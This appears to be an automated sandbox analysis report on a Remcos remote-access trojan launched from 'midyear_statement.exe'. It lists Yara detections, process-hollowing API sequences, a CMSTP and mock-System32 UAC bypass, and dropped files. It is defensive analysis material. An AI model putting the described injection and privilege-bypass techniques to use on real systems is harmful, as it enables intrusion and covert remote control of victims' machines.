                      Source: Yara matchFile source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000002.3664888730.0000000013EEF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.1622995189.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3664577079.000000001248D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.1589543498.000000002427B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3664577079.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.1658571409.00000000244BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: wkrriuhD.pif PID: 7860, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: wkrriuhD.pif PID: 1652, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Contains functionalty to change the wallpaper
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1234C9E2 SystemParametersInfoW,24_2_1234C9E2

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: wkrriuhD.pif PID: 7860, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: wkrriuhD.pif PID: 1652, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040BCD1C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_040BCD1C
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040BCE00 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_040BCE00
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040B7EE8 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_040B7EE8
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040BD850 InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,Sleep,WinExec,WinExec,RtlMoveMemory,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,ExitProcess,0_2_040BD850
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040B78F8 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,0_2_040B78F8
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040B7A50 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_040B7A50
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040BA160 GetModuleHandleW,GetProcAddress,GetCurrentProcess,IsBadReadPtr,IsBadReadPtr,GetCurrentProcess,GetModuleHandleW,GetProcAddress,GetModuleHandleW,GetProcAddress,CloseHandle,NtFreeVirtualMemory,GetCurrentProcess,NtFreeVirtualMemory,GetCurrentProcess,NtFreeVirtualMemory,0_2_040BA160
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040C62C4 CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,ExitProcess,0_2_040C62C4
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040BD850 InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,Sleep,WinExec,WinExec,RtlMoveMemory,CreateProcessAsUserW,NtQueueApcThread,ResumeThread,CloseHandle,ExitProcess,0_2_040BD850
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040BCD1A RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_040BCD1A
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040B7EE6 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_040B7EE6
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040B78F6 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,0_2_040B78F6
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_123480EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,24_2_123480EF
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_123432D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,24_2_123432D2
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1234BB35 OpenProcess,NtResumeProcess,CloseHandle,24_2_1234BB35
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1234BB09 OpenProcess,NtSuspendProcess,CloseHandle,24_2_1234BB09
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,27_2_0040DD85
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_00401806 NtdllDefWindowProc_W,27_2_00401806
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_004018C0 NtdllDefWindowProc_W,27_2_004018C0
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 28_2_004016FD NtdllDefWindowProc_A,28_2_004016FD
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 28_2_004017B7 NtdllDefWindowProc_A,28_2_004017B7
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040B7EE8 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_040B7EE8
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_123467B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,24_2_123467B4
                      Source: C:\Users\user\Desktop\midyear_statement.exeFile created: C:\Windows \System32\2506803.exeJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeFile created: C:\Windows \System32\netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeFile created: C:\Windows \System32\KDECO.batJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\WindowsJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows \System32Jump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeFile deleted: C:\Windows \System32\netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeCode function: 0_2_040A20C40_2_040A20C4
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_004057B824_2_004057B8
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005CF0DD24_2_005CF0DD
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005B817F24_2_005B817F
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005E410D24_2_005E410D
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005C82C824_2_005C82C8
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005CF33A24_2_005CF33A
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005C955224_2_005C9552
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005C86E024_2_005C86E0
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005C472824_2_005C4728
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005DE7AB24_2_005DE7AB
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005B882824_2_005B8828
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005AE94424_2_005AE944
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005B899124_2_005B8991
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005C8B1524_2_005C8B15
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005B7BF024_2_005B7BF0
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005C6C4024_2_005C6C40
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005CEC7F24_2_005CEC7F
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005C7DCC24_2_005C7DCC
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005A4DAC24_2_005A4DAC
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005AFEDC24_2_005AFEDC
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005CEEAE24_2_005CEEAE
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005C8F4A24_2_005C8F4A
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005E4F3B24_2_005E4F3B
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_005D6FD224_2_005D6FD2
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1236E2FB24_2_1236E2FB
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1238332B24_2_1238332B
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1235739D24_2_1235739D
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1234F0FA24_2_1234F0FA
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_123470C224_2_123470C2
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1236E0CC24_2_1236E0CC
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1234712124_2_12347121
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1234710424_2_12347104
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1236816824_2_12368168
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1238415924_2_12384159
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_123761F024_2_123761F0
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_123686E824_2_123686E8
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1236877024_2_12368770
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_123674E624_2_123674E6
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1236E55824_2_1236E558
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_12357A4624_2_12357A46
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1234DB6224_2_1234DB62
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_12357BAF24_2_12357BAF
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_123678FE24_2_123678FE
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1236394624_2_12363946
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1237D9C924_2_1237D9C9
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_12356E0E24_2_12356E0E
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_12365E5E24_2_12365E5E
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1236DE9D24_2_1236DE9D
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_12366FEA24_2_12366FEA
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_12343FCA24_2_12343FCA
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_12367D3324_2_12367D33
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1464B5C124_2_1464B5C1
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_1465719424_2_14657194
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_0044B04027_2_0044B040
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_0043610D27_2_0043610D
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_0044731027_2_00447310
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_0044A49027_2_0044A490
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_0040755A27_2_0040755A
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_0043C56027_2_0043C560
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_0044B61027_2_0044B610
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_0044D6C027_2_0044D6C0
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_004476F027_2_004476F0
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_0044B87027_2_0044B870
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_0044081D27_2_0044081D
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_0041495727_2_00414957
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_004079EE27_2_004079EE
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_00407AEB27_2_00407AEB
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_0044AA8027_2_0044AA80
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_00412AA927_2_00412AA9
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_00404B7427_2_00404B74
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_00404B0327_2_00404B03
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_0044BBD827_2_0044BBD8
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_00404BE527_2_00404BE5
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_00404C7627_2_00404C76
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_00415CFE27_2_00415CFE
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_00416D7227_2_00416D72
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_00446D3027_2_00446D30
